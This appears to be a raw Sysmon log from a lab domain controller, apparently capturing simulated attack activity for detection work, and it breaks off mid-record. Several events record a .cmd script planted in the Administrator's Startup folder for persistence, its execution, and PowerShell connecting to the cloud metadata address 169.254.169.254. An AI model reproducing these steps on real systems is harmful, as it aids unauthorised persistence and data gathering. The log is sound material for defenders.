13:30:28.170{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-476E-6000-3105-000000009A01}65806600C:\Windows\system32\conhost.exe{08A6967A-4774-6000-3805-000000009A01}6328C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4774-6000-3805-000000009A01}6328C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-476E-6000-3005-000000009A01}65726576C:\Windows\system32\cmd.exe{08A6967A-4774-6000-3805-000000009A01}6328C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+4917|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.129{08A6967A-4774-6000-3805-000000009A01}6328C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXEfindstr /v DELETEME C:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x800000000000000012515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-476E-6000-3105-000000009A01}65806600C:\Windows\system32\conhost.exe{08A6967A-4774-6000-3705-000000009A01}6336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000012514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT10232021-01-14 13:30:28.123{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd2021-01-14 13:30:28.123 10341000x800000000000000012513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4774-6000-3705-000000009A01}6336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.123{08A6967A-476E-6000-3005-000000009A01}65726576C:\Windows\system32\cmd.exe{08A6967A-4774-6000-3705-000000009A01}6336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+484b|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.125{08A6967A-4774-6000-3705-000000009A01}6336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 354300x800000000000000012506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.459{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-250.attackrange.local51789-false169.254.169.254-80http 354300x800000000000000012505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.438{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-250.attackrange.local51788-false169.254.169.254-80http 10341000x800000000000000012649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.982{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.982{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.967{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.967{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.967{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.967{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.967{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+